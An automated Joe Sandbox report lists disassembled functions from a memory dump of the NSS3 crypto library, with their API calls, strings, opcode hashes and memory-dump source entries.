PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CADCD93,?), ref: 6CADCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CADCD93,?,?,?,?,?,?,?,?,?,?,?,6CADCD93,?), ref: 6CADCF78

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 1168de477d535d86847c37c4adf62d5e7ebf815ba726e574999404cd00fa6490
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 5811D2B5A003005BEB00AAA66D41BBBB6EC9F5815DF054039ED09D7741FB60EA4D86B2

Function 6CA88C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA88C1B
EnterCriticalSection.KERNEL32 ref: 6CA88C34
PL_ArenaAllocate.NSS3 ref: 6CA88C65
PR_Unlock.NSS3 ref: 6CA88C9C
PR_Unlock.NSS3 ref: 6CA88CB6

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

Strings

KRAM, xrefs: 6CA88C8F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: e3d6e9c0e4af1fbf37c9c08a9ea98de55d1d8d859c277bce0d84f6e6b29e73b0
Instruction ID: 486fa957bf549a50f34273c18d6510e14ac18a1b7868b376b1d01b9cbc0b24f0
Opcode Fuzzy Hash: e3d6e9c0e4af1fbf37c9c08a9ea98de55d1d8d859c277bce0d84f6e6b29e73b0
Instruction Fuzzy Hash: DB217FF1A066118FD700AF79C484559BBF4FF05308F05896ED8888B715EB35E8C9CB92

Function 6CB03E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6CB05B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB05B56

PR_EnterMonitor.NSS3(?), ref: 6CB03E45

Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390AB
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390C9
Part of subcall function 6CB39090: EnterCriticalSection.KERNEL32 ref: 6CB390E5
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB39116
Part of subcall function 6CB39090: LeaveCriticalSection.KERNEL32 ref: 6CB3913F

PR_EnterMonitor.NSS3(?), ref: 6CB03E5C
PR_EnterMonitor.NSS3(?), ref: 6CB03E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CB03EA6

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PR_ExitMonitor.NSS3(?), ref: 6CB03EC0
PR_ExitMonitor.NSS3(?), ref: 6CB03ED7
PR_ExitMonitor.NSS3(?), ref: 6CB03EEE

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 15e233b4cc53f92d92eedcb3ac56092cfed933c9b2ba910a050ba7b6a7b45c0c
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: 4611BB71A10590AFD7315E29FC06FCB7BA1DB40308F001934E65D87A20EA36E829C752

Function 6CB82C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CB82CA0
PR_ExitMonitor.NSS3 ref: 6CB82CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CB82CD1
strdup.MOZGLUE(?), ref: 6CB82CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CB82D27

Strings

Loaded library %s (static lib), xrefs: 6CB82D22

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: f80c8349936587e0dec34d8ea45db2b60eeb62827512c1683d846b54f1902735
Instruction ID: 06d3a73a639074c93fe2c5739bac7cd92328ba9cc20005027efc5645a9698caa
Opcode Fuzzy Hash: f80c8349936587e0dec34d8ea45db2b60eeb62827512c1683d846b54f1902735
Instruction Fuzzy Hash: 2B11C8B5B022909FEB108F15D85866A7BB8EB4535DF18813DE809C7B41D731E848CFA3

Function 6CA768E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA768FB
EnterCriticalSection.KERNEL32 ref: 6CA76913
PORT_FreeArena_Util.NSS3 ref: 6CA7693E
PR_Unlock.NSS3 ref: 6CA76946
DeleteCriticalSection.KERNEL32 ref: 6CA76951
free.MOZGLUE ref: 6CA7695D
PR_Unlock.NSS3 ref: 6CA76968

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: 90036870409ce318b1fdce2e630c0cf6e96350707d563565b29ceb6de177a223
Instruction ID: e0dc25984f2b97decf31131d9041c5f81bb3dc83f5727aa2088dfcf923d134a3
Opcode Fuzzy Hash: 90036870409ce318b1fdce2e630c0cf6e96350707d563565b29ceb6de177a223
Instruction Fuzzy Hash: 68115EB56047159FDB00BFB8C08866EBBF4FF06248F054568D8A9DB701EB30D498CBA2

Function 6CA7BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CA7BDCA

Part of subcall function 6CAD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
Part of subcall function 6CAD0FF0: PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016
Part of subcall function 6CAD0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA7BDDB

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA7BDEC

Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CA7BE03

Part of subcall function 6CACFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAC8D2D,?,00000000,?), ref: 6CACFB85
Part of subcall function 6CACFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CACFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA7BE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA7BE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA7BE3B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: cd2d41aaaedabb346aaf4aa6ecab82ccbebb464c61d9693c35318e085a079505
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: CD012BE9A4020167F62022667C01FAB35585F5029DF140130FF0896B82FB55E15D82F6

Function 6CAD0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016

Part of subcall function 6CB398D0: calloc.MOZGLUE(00000001,00000084,6CA60936,00000001,?,6CA6102C), ref: 6CB398E5

PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B
TlsGetValue.KERNEL32(00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1044
free.MOZGLUE(00000000,?,00000800,6CA6EF74,00000000), ref: 6CAD1064

Strings

security, xrefs: 6CAD1025

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 0335b17a9feb910c64f4b24ea8acb020ed9f347b6006852e79018705caab4eb3
Instruction ID: 371e238385e3fc283173e91d9f67fd5e6f3330e96634d89f440e07abcce59613
Opcode Fuzzy Hash: 0335b17a9feb910c64f4b24ea8acb020ed9f347b6006852e79018705caab4eb3
Instruction Fuzzy Hash: 45016B30A4029057E7203F3D8C087663A78FF06769F060115EA0897E51EB70F2D8DBD1

Function 6CB01C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB01C74

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6CB01C92
free.MOZGLUE(?), ref: 6CB01C99
DeleteCriticalSection.KERNEL32(?), ref: 6CB01CCB
free.MOZGLUE(?), ref: 6CB01CD2

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 327c578dbe2b2d68573146f6a10c6becd11f2411dd0212daf24e5c57496a0940
Instruction ID: 9b1904e5811d6f1886f89b9207be19b4192d7ac0241b575b78dbe9cc7d4825d6
Opcode Fuzzy Hash: 327c578dbe2b2d68573146f6a10c6becd11f2411dd0212daf24e5c57496a0940
Instruction Fuzzy Hash: D701D2B1F052A15FDE28AFA49C0DB497BB8A71A30CF040535E90AA7A40D325F5048793

Function 6CB61C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CA63D77,?,?,6CA64E1D), ref: 6CB61C8A
sqlite3_free.NSS3(00000000), ref: 6CB61CB6

Strings

an index, xrefs: 6CB61C67
a CHECK constraint, xrefs: 6CB61C76, 6CB61C81
a generated column, xrefs: 6CB61C6C
non-deterministic use of %s() in %s, xrefs: 6CB61C85

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
API String ID: 1840970956-3705377941
Opcode ID: c3eaf3fd644833681c1c1385d8fabd52d73ebd78c78f346ecd8ffc7049f64e02
Instruction ID: 2be095887a7cc9b3654f99ff80d201d9e4593004960d9b874937c7468e3f5ca7
Opcode Fuzzy Hash: c3eaf3fd644833681c1c1385d8fabd52d73ebd78c78f346ecd8ffc7049f64e02
Instruction Fuzzy Hash: F30147B5A041804BD700BF68D80297177E5EF8634CF15487DED859BB02EB32E8ABC751

Function 6CB8C9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,6CB01AB6,00000000,?,?,6CB007B9,?), ref: 6CB8C9C6
free.MOZGLUE(?,?,6CB007B9,?), ref: 6CB8C9D3
DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6CB8C9E5
free.MOZGLUE(?), ref: 6CB8C9EC
DeleteCriticalSection.KERNEL32(00000080), ref: 6CB8C9F8
free.MOZGLUE(?), ref: 6CB8C9FF
free.MOZGLUE(00000000), ref: 6CB8CA0B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: e983b72ad216122313d6571a7823acf2e6f4abb683e90dace165e764f7d0fef6
Instruction ID: 030685d24d95d0f9ff9250e2acc998b9c513ac5311a00a06bf17620a1bd37d9c
Opcode Fuzzy Hash: e983b72ad216122313d6571a7823acf2e6f4abb683e90dace165e764f7d0fef6
Instruction Fuzzy Hash: 97016DB2600609ABDB00EFB5CC88897B7FCFE5D6613040526E916C3600E739F65ACBE1

Function 6CB12E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB13046

Part of subcall function 6CAFEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CAE7FFB), ref: 6CB1312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB13154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB12E8B

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

Part of subcall function 6CAFF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CAE9BFF,?,00000000,00000000), ref: 6CAFF134

memcpy.VCRUNTIME140(8B3C75C0,?,6CAE7FFA), ref: 6CB12EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB1317B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 36987e9a39552b328f87333b475e298e113a3c63aae86551c4a153e164fdf876
Instruction ID: bf23ebe4cc6f70494e5b706f43c517624091239f823ea4062eaf986bdcd194f3
Opcode Fuzzy Hash: 36987e9a39552b328f87333b475e298e113a3c63aae86551c4a153e164fdf876
Instruction Fuzzy Hash: 93A1BC75A042189FDF24CF54CC84BEAB7B5EF49308F048199E94967B41E731AA89CF92

Function 6CADED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CADED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CADEDCE

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

free.MOZGLUE(00000000,?,?,?,?,6CADB04F), ref: 6CADEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CADEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CADEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CADEEFB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: f3c3fd4e32db82dd41e3799b24374ac59d6d70f7bd42bf4b0aa24c333203d622
Instruction ID: ed43632fe799c5628da407a1d46f337887e031d90339de091a115b21178ec9e6
Opcode Fuzzy Hash: f3c3fd4e32db82dd41e3799b24374ac59d6d70f7bd42bf4b0aa24c333203d622
Instruction Fuzzy Hash: 68816DB5A002059FEB14CF55DD84AABB7F5BF48308F19442CE8259B751DB30F994CBA1

Function 6CADCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CADC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CADDAE2,?), ref: 6CADC6C2

PR_Now.NSS3 ref: 6CADCD35

Part of subcall function 6CB39DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB80A27), ref: 6CB39DC6
Part of subcall function 6CB39DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB80A27), ref: 6CB39DD1
Part of subcall function 6CB39DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB39DED

Part of subcall function 6CAC6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA71C6F,00000000,00000004,?,?), ref: 6CAC6C3F

PR_GetCurrentThread.NSS3 ref: 6CADCD54

Part of subcall function 6CB39BF0: TlsGetValue.KERNEL32(?,?,?,6CB80A75), ref: 6CB39C07

Part of subcall function 6CAC7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA71CCC,00000000,00000000,?,?), ref: 6CAC729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CADCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CADCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CADCE2C

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CADCE40

Part of subcall function 6CAD14C0: TlsGetValue.KERNEL32 ref: 6CAD14E0
Part of subcall function 6CAD14C0: EnterCriticalSection.KERNEL32 ref: 6CAD14F5
Part of subcall function 6CAD14C0: PR_Unlock.NSS3 ref: 6CAD150D

Part of subcall function 6CADCEE0: PORT_ArenaMark_Util.NSS3(?,6CADCD93,?), ref: 6CADCEEE
Part of subcall function 6CADCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CADCD93,?), ref: 6CADCEFC
Part of subcall function 6CADCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CADCD93,?), ref: 6CADCF0B
